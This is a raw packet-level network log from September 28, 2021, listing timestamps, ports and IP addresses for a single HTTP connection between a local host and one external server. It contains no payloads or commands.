Sep 28, 2021 07:14:06.049432039 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.049448967 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.049463987 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.049480915 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.049489975 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.049499035 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.049520969 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.049551964 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.058645010 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.058676004 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.058693886 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.058708906 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.058794975 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.065428019 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.065459967 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.065480947 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.065495968 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.065516949 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.065534115 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.065567970 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.065579891 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.065603971 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.065623999 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.065634012 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.065645933 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.065665960 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.065674067 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.065689087 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.065701962 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.065709114 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.065725088 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.065754890 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.065778017 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.065799952 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.065903902 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.065931082 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.065953970 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.065963984 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.065980911 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.066004992 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.066024065 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.066030025 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.066050053 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.066070080 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.066073895 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.066096067 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.066103935 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.066117048 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.066134930 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.066154957 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.066185951 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.067374945 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.067409039 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.067430973 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.067446947 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.067517996 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.067563057 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.067581892 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.067600965 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.067660093 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.067677021 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.067708969 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.067723989 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.067734957 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.067779064 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.067791939 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.067806959 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.067872047 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.067939997 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.067979097 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.068030119 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.068067074 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.068090916 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.068151951 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.068192959 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.068285942 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.068310976 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.068345070 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.068352938 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.068406105 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.068618059 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.068645000 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.068666935 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.068696976 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.068840981 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.068881035 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.068911076 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.068928003 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.068955898 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.068984032 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.069000006 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.069022894 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.069048882 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.069057941 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.069075108 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.069089890 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.069108009 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.069142103 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.084122896 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084151983 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084171057 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084188938 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084204912 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084223032 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084242105 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084249020 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.084296942 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.084321976 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084342957 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084361076 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084369898 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.084403038 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.084599972 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084619999 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084639072 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084661961 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084675074 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.084681988 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084698915 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084713936 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.084719896 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084736109 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084748983 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.084752083 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084769964 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084779978 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.084789038 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084810972 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084817886 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.084829092 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084846020 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084856987 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.084867001 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084884882 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.084889889 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.084924936 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.085095882 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.085118055 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.085136890 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.085154057 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.085171938 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.085175991 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.085191965 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.085195065 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.085232973 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.094429970 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.094468117 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.094491959 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.094516993 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.094532967 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.094578028 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.100969076 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101011038 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101037025 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101073027 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101097107 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101119995 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.101124048 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101150036 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101152897 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.101174116 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101176977 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.101197958 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101222038 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101229906 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.101244926 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101260900 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.101269960 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101294041 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101316929 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.101321936 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101346970 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101361990 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.101370096 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101393938 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101417065 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.101418018 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101443052 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101463079 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.101466894 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101490974 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101511002 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.101516962 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101543903 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101563931 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.101566076 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101588011 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101605892 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101613045 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.101620913 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.101645947 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.102739096 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.102772951 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.102797031 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.102817059 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.102819920 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.102843046 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.102848053 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.102869987 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.102889061 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.102895975 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.102927923 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.102937937 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.102956057 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.102978945 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.103001118 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.103002071 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.103024960 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.103040934 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.103753090 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.103785992 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.103807926 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.103811979 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.103837013 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.103849888 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.103859901 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.103883982 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.103903055 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.103905916 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.103929996 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.103944063 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.103952885 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.103998899 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.104140043 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.104177952 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.104219913 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.104234934 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.104270935 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.104296923 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.104321003 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.104321003 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.104346037 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.104365110 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.104370117 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.104397058 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.104408026 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:06.104422092 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:06.104464054 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:07.903348923 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:07.940206051 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.157036066 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.157088995 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.157126904 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.157149076 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.157154083 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.157192945 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.157207966 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.157231092 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.157269001 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.157284021 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.157563925 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.157603025 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.157620907 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.157643080 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.157690048 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.192596912 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.196044922 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.196110010 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.196163893 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.196196079 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.196326971 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.196815014 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.196871996 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.196914911 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.196960926 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.196990967 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.197029114 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.197060108 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.197077036 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.197165966 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.197290897 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.197367907 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.197410107 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.197436094 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.197654009 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.197726011 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.197731018 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.197813034 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.197911978 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.198002100 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.198040962 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.198077917 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.198101997 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.198497057 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.198575974 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.233171940 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.233192921 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.233206034 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.233273029 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.235280991 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.235299110 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.235316992 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.235333920 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.235338926 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.235352039 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.235371113 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.235390902 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.235424042 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.235768080 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.235802889 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.235829115 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.235836983 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.235843897 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.235865116 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.235877037 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.235881090 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.235908031 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.236397028 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.236416101 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.236430883 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.236474991 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.236495018 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.237040997 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.237061024 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.237076044 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.237164021 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.237281084 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.237337112 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.237349033 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.237366915 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.237422943 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.237865925 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.237910032 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.237927914 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.237953901 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.237967968 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.237982988 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.238024950 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.238076925 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.238821983 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.238851070 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.238868952 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.238941908 CEST	49751	80	192.168.2.4	185.138.164.150
